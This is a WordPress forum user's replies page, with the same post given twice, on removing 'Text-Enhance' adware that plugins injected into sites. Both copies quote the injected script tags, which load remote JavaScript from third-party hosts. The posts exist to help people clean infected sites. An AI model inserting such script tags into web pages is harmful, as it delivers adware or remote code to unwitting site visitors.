Rlamothe
Forum Replies Created
-
Forum: Everything else WordPress
In reply to: Text-EnhanceHey Guys.. I spent a few days driving myself crazy over Text enhance on my WP sites… Until I stopped thinking it was a major problem and started thinking smaller. For me it was two plugins, BlackStudio Tiny MCE and Testimonials plugin… Here’s what you do…
Deactivate all of your plugins. One by one, turn them on and refresh your site until you see the ads popup again.. now you have isolated the plugin.
Check each page to see if the code is there. You may still find it on a few pages, however, when you go to ‘edit’ that particular page, the code you are looking for will now be visible in the html editor. (Typically at the bottom.) Simply delete the script and update the page…. Boom! All gone!
This is the code that was on my site:
<script type=”text/javascript” src=”//loading-resource.com/data.geo.php?callback=window.__geo.getData”></script><script type=”text/javascript” src=”https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862″></script>
Forum: Fixing WordPress
In reply to: wordpress plugin showing text-enhance links?Hey Guys.. I spent a few days driving myself crazy over Text enhance on my WP sites… Until I stopped thinking it was a major problem and started thinking smaller. For me it was two plugins, BlackStudio Tiny MCE and Testimonials plugin… Here’s what you do…
Deactivate all of your plugins. One by one, turn them on and refresh your site until you see the ads popup again.. now you have isolated the plugin.
Check each page to see if the code is there. You may still find it on a few pages, however, when you go to ‘edit’ that particular page, the code you are looking for will now be visible in the html editor. (Typically at the bottom.) Simply delete the script and update the page…. Boom! All gone!
This is the code that was on my site:
<script type=”text/javascript” src=”//loading-resource.com/data.geo.php?callback=window.__geo.getData”></script><script type=”text/javascript” src=”https://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862″></script>